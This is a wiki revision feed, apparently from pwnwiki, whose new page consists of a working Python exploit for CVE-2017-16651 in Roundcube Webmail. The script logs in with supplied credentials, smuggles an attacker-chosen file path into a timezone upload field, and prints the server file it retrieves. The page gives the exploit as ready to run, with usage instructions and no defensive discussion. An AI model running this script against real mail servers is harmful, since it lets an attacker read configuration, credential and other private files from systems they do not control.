https://pwnwiki.com/index.php?action=history&feed=atom&title=Roundcube_Webmail_1.2_%E6%96%87%E4%BB%B6%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E Roundcube Webmail 1.2 文件泄漏漏洞 - Revision history 2026-04-21T02:19:05Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Roundcube_Webmail_1.2_%E6%96%87%E4%BB%B6%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E&diff=1265&oldid=prev Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Roundcube Webmail 1.2 - File Disclosure # Date: 09-11-2017 # Exploit Author: stonepresto # Vendor Homepage: https://roundcube.net/ # Software L..." 2021-04-08T09:34:59Z <p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Roundcube Webmail 1.2 - File Disclosure # Date: 09-11-2017 # Exploit Author: stonepresto # Vendor Homepage: https://roundcube.net/ # Software L...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: Roundcube Webmail 1.2 - File Disclosure <br /> # Date: 09-11-2017<br /> # Exploit Author: stonepresto<br /> # Vendor Homepage: https://roundcube.net/<br /> # Software Link: https://sourceforge.net/projects/roundcubemail/files/roundcubemail-beta/1.2-beta/<br /> # Version: 1.1.0 - 1.1.9, 1.2.0 - 1.2.6, 1.3.0 - 1.3.2<br /> # Tested on: roundcube version 1.2-beta<br /> # CVE : CVE-2017-16651<br /> <br /> #!/usr/bin/env python3<br /> # Reference: https://gist.github.com/thomascube/3ace32074e23fca0e6510e500bd914a1<br /> # https://github.com/stonepresto/CVE-2017-16651<br /> # Exploit Author: stonepresto<br /> <br /> import requests<br /> import re<br /> import sys<br /> <br /> URL=&quot;https://127.0.0.1/&quot;<br /> USER=&quot;user@example.com&quot;<br /> PASS=&quot;password&quot;<br /> <br /> def main():<br /> s = requests.Session()<br /> r = s.get(URL,params={&quot;_task&quot;:&quot;login&quot;},verify=False)<br /> token = None<br /> for line in r.text.split(&quot;\n&quot;):<br /> if 'name=&quot;_token&quot;' in line:<br /> token = line.split(&quot;value=&quot;)[1].split('&quot;')[1]<br /> print(&quot;[+] token: %s&quot; % token)<br /> if token is None:<br /> print(&quot;[!] unable to retrieve token&quot;)<br /> sys.exit(1)<br /> <br /> data = {<br /> &quot;_token&quot;:token,<br /> &quot;_task&quot;:&quot;login&quot;,<br /> &quot;_action&quot;:&quot;login&quot;,<br /> &quot;_timezone[files][1][path]&quot;:sys.argv[1],<br /> &quot;_url&quot;:&quot;_task%3Dlogin&quot;,<br /> &quot;_user&quot;:USER,<br /> &quot;_pass&quot;:PASS<br /> }<br /> r = s.post(URL,params={&quot;_task&quot;:&quot;login&quot;},data=data,verify=False)<br /> <br /> params = {<br /> &quot;_task&quot;:&quot;settings&quot;,<br /> &quot;_action&quot;:&quot;upload-display&quot;,<br /> &quot;_from&quot;:&quot;timezone&quot;,<br /> &quot;_file&quot;:&quot;rcmfile1&quot;<br /> }<br /> <br /> r = s.get(URL,params=params,verify=False)<br /> print(r.text)<br /> <br /> if __name__ == &quot;__main__&quot;:<br /> if len(sys.argv) != 2:<br /> print(&quot;[!] Usage: %s &lt;file-to-read&gt;&quot; % sys.argv[0])<br /> else:<br /> main()<br /> &lt;/pre&gt;</div> Pwnwiki